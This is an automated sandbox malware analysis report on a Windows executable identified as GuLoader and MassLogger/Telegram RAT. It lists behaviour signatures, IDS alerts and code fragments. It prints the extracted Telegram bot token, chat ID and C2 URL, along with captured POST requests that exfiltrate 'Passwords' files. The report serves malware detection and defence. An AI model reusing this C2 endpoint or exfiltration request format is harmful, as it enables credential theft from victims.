Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6mGpn6kupm.exe

Overview

General Information

Sample name:6mGpn6kupm.exe
renamed because original name is a hash value
Original sample name:2c399d3af3092bf9b9d0ed6c4b7bef3ac082cf09d9947adc9df12d11a6fea3d1.exe
Analysis ID:1588140
MD5:89bb4eeab81b80681733b2d7df68289b
SHA1:655666fc351362a9aa37758163d3e3e63c6400b8
SHA256:2c399d3af3092bf9b9d0ed6c4b7bef3ac082cf09d9947adc9df12d11a6fea3d1
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 6mGpn6kupm.exe (PID: 8108 cmdline: "C:\Users\user\Desktop\6mGpn6kupm.exe" MD5: 89BB4EEAB81B80681733B2D7DF68289B)
    • 6mGpn6kupm.exe (PID: 3144 cmdline: "C:\Users\user\Desktop\6mGpn6kupm.exe" MD5: 89BB4EEAB81B80681733B2D7DF68289B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2568386799.0000000034EBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2568386799.0000000034EBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2568386799.0000000034EBB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1714407995.00000000051B6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: 6mGpn6kupm.exe PID: 3144JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:49:45.583894+010020577441Malware Command and Control Activity Detected192.168.2.1049978149.154.167.220443TCP
            2025-01-10T21:49:47.504281+010020577441Malware Command and Control Activity Detected192.168.2.1049980149.154.167.220443TCP
            2025-01-10T21:49:49.126072+010020577441Malware Command and Control Activity Detected192.168.2.1049982149.154.167.220443TCP
            2025-01-10T21:49:51.017539+010020577441Malware Command and Control Activity Detected192.168.2.1049984149.154.167.220443TCP
            2025-01-10T21:49:52.723364+010020577441Malware Command and Control Activity Detected192.168.2.1049986149.154.167.220443TCP
            2025-01-10T21:49:54.401898+010020577441Malware Command and Control Activity Detected192.168.2.1049988149.154.167.220443TCP
            2025-01-10T21:49:56.022154+010020577441Malware Command and Control Activity Detected192.168.2.1049990149.154.167.220443TCP
            2025-01-10T21:49:57.593488+010020577441Malware Command and Control Activity Detected192.168.2.1049992149.154.167.220443TCP
            2025-01-10T21:49:59.164526+010020577441Malware Command and Control Activity Detected192.168.2.1049994149.154.167.220443TCP
            2025-01-10T21:50:00.773884+010020577441Malware Command and Control Activity Detected192.168.2.1049996149.154.167.220443TCP
            2025-01-10T21:50:23.904209+010020577441Malware Command and Control Activity Detected192.168.2.1049999149.154.167.220443TCP
            2025-01-10T21:50:25.644407+010020577441Malware Command and Control Activity Detected192.168.2.1050001149.154.167.220443TCP
            2025-01-10T21:50:27.239542+010020577441Malware Command and Control Activity Detected192.168.2.1050003149.154.167.220443TCP
            2025-01-10T21:50:29.916493+010020577441Malware Command and Control Activity Detected192.168.2.1050005149.154.167.220443TCP
            2025-01-10T21:50:32.235747+010020577441Malware Command and Control Activity Detected192.168.2.1050007149.154.167.220443TCP
            2025-01-10T21:50:33.809983+010020577441Malware Command and Control Activity Detected192.168.2.1050009149.154.167.220443TCP
            2025-01-10T21:50:35.549505+010020577441Malware Command and Control Activity Detected192.168.2.1050011149.154.167.220443TCP
            2025-01-10T21:50:37.282340+010020577441Malware Command and Control Activity Detected192.168.2.1050013149.154.167.220443TCP
            2025-01-10T21:50:40.200667+010020577441Malware Command and Control Activity Detected192.168.2.1050015149.154.167.220443TCP
            2025-01-10T21:50:42.811954+010020577441Malware Command and Control Activity Detected192.168.2.1050017149.154.167.220443TCP
            2025-01-10T21:50:45.461534+010020577441Malware Command and Control Activity Detected192.168.2.1050019149.154.167.220443TCP
            2025-01-10T21:50:47.189904+010020577441Malware Command and Control Activity Detected192.168.2.1050021149.154.167.220443TCP
            2025-01-10T21:50:52.291513+010020577441Malware Command and Control Activity Detected192.168.2.1050023149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:49:37.908297+010028032742Potentially Bad Traffic192.168.2.1049975132.226.247.7380TCP
            2025-01-10T21:49:44.690986+010028032742Potentially Bad Traffic192.168.2.1049975132.226.247.7380TCP
            2025-01-10T21:49:46.517683+010028032742Potentially Bad Traffic192.168.2.1049979132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:49:32.717084+010028032702Potentially Bad Traffic192.168.2.1049967172.217.23.110443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:49:45.319627+010018100081Potentially Bad Traffic192.168.2.1049978149.154.167.220443TCP
            2025-01-10T21:49:47.108780+010018100081Potentially Bad Traffic192.168.2.1049980149.154.167.220443TCP
            2025-01-10T21:49:48.854869+010018100081Potentially Bad Traffic192.168.2.1049982149.154.167.220443TCP
            2025-01-10T21:49:50.551607+010018100081Potentially Bad Traffic192.168.2.1049984149.154.167.220443TCP
            2025-01-10T21:49:52.416148+010018100081Potentially Bad Traffic192.168.2.1049986149.154.167.220443TCP
            2025-01-10T21:49:54.043834+010018100081Potentially Bad Traffic192.168.2.1049988149.154.167.220443TCP
            2025-01-10T21:49:55.721209+010018100081Potentially Bad Traffic192.168.2.1049990149.154.167.220443TCP
            2025-01-10T21:49:57.350231+010018100081Potentially Bad Traffic192.168.2.1049992149.154.167.220443TCP
            2025-01-10T21:49:58.898541+010018100081Potentially Bad Traffic192.168.2.1049994149.154.167.220443TCP
            2025-01-10T21:50:00.483307+010018100081Potentially Bad Traffic192.168.2.1049996149.154.167.220443TCP
            2025-01-10T21:50:23.662910+010018100081Potentially Bad Traffic192.168.2.1049999149.154.167.220443TCP
            2025-01-10T21:50:25.387924+010018100081Potentially Bad Traffic192.168.2.1050001149.154.167.220443TCP
            2025-01-10T21:50:27.025192+010018100081Potentially Bad Traffic192.168.2.1050003149.154.167.220443TCP
            2025-01-10T21:50:29.610258+010018100081Potentially Bad Traffic192.168.2.1050005149.154.167.220443TCP
            2025-01-10T21:50:31.969968+010018100081Potentially Bad Traffic192.168.2.1050007149.154.167.220443TCP
            2025-01-10T21:50:33.552667+010018100081Potentially Bad Traffic192.168.2.1050009149.154.167.220443TCP
            2025-01-10T21:50:35.133589+010018100081Potentially Bad Traffic192.168.2.1050011149.154.167.220443TCP
            2025-01-10T21:50:36.904548+010018100081Potentially Bad Traffic192.168.2.1050013149.154.167.220443TCP
            2025-01-10T21:50:39.716360+010018100081Potentially Bad Traffic192.168.2.1050015149.154.167.220443TCP
            2025-01-10T21:50:42.534654+010018100081Potentially Bad Traffic192.168.2.1050017149.154.167.220443TCP
            2025-01-10T21:50:45.147729+010018100081Potentially Bad Traffic192.168.2.1050019149.154.167.220443TCP
            2025-01-10T21:50:46.798816+010018100081Potentially Bad Traffic192.168.2.1050021149.154.167.220443TCP
            2025-01-10T21:50:51.767666+010018100081Potentially Bad Traffic192.168.2.1050023149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 6mGpn6kupm.exeAvira: detected
            Source: 00000005.00000002.2568386799.0000000034EBB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
            Source: 6mGpn6kupm.exe.3144.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
            Source: 6mGpn6kupm.exeReversingLabs: Detection: 57%
            Source: 6mGpn6kupm.exeVirustotal: Detection: 76%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAD1EC CryptUnprotectData,5_2_34CAD1EC
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAD9D9 CryptUnprotectData,5_2_34CAD9D9
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAD240 CryptUnprotectData,5_2_34CAD240
            Source: 6mGpn6kupm.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.10:49977 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.23.110:443 -> 192.168.2.10:49967 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.10:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49978 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49984 version: TLS 1.2
            Source: 6mGpn6kupm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CA1042h5_2_34CA0C28
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CAC985h5_2_34CAC638
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CA0671h5_2_34CA03C4
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CAB791h5_2_34CAB4EC
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CA1042h5_2_34CA0C1A
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CAC041h5_2_34CABD88
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CAE198h5_2_34CADEE1
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CAEA48h5_2_34CAE790
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CA1042h5_2_34CA0F6F
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CAF2F8h5_2_34CAF043
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CAB339h5_2_34CAB07F
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CAC499h5_2_34CAC1F2
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CABBE9h5_2_34CAB944
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CADD40h5_2_34CADA89
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CAEEA0h5_2_34CAEBF7
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 34CAE5F0h5_2_34CAE339
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A8882Dh5_2_37A88650
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A891B7h5_2_37A88650
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then push 00000000h5_2_37A8BDF0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A81B00h5_2_37A81858
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A81250h5_2_37A80FA8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A86A68h5_2_37A867C0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A861B8h5_2_37A85F10
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A84218h5_2_37A83F70
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A83968h5_2_37A836C0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A830B8h5_2_37A82E10
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A85908h5_2_37A85660
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A85058h5_2_37A84DB0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A82808h5_2_37A82560
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A81F58h5_2_37A81CB0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A87770h5_2_37A874C8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A816A8h5_2_37A81400
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A86EC0h5_2_37A86C18
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_37A8CBE7
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A84670h5_2_37A843C8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A83DC0h5_2_37A83B18
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A86610h5_2_37A86368
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_37A87B62
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_37A88373
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A85D60h5_2_37A85AB8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A854B0h5_2_37A85208
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A83510h5_2_37A83268
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A82C60h5_2_37A829B8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_37A88193
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then push 00000000h5_2_37A8C92F
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A823B0h5_2_37A82108
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A84ACAh5_2_37A84820
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then jmp 37A87318h5_2_37A87070
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 4x nop then push 00000000h5_2_37FBE790

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50005 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50003 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49994 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50005 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50003 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49988 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49988 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50009 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50011 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50009 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50013 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50013 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50011 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49980 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49980 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49986 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50017 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49986 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50017 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50007 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50007 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50015 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50015 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49984 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49984 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49999 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49999 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50023 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50023 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50019 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49990 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50019 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49990 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49992 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50001 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50001 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49982 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:50021 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:50021 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49982 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318e66da22f5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a4b90ef901Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31bafa87d516Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31cfc8c5e025Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e74b689e6fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31fd5ac83069Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3211fa17da55Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32268ab0e2a6Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3239af1dc67cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd324cc6aab803Host: api.telegram.orgContent-Length: 1090
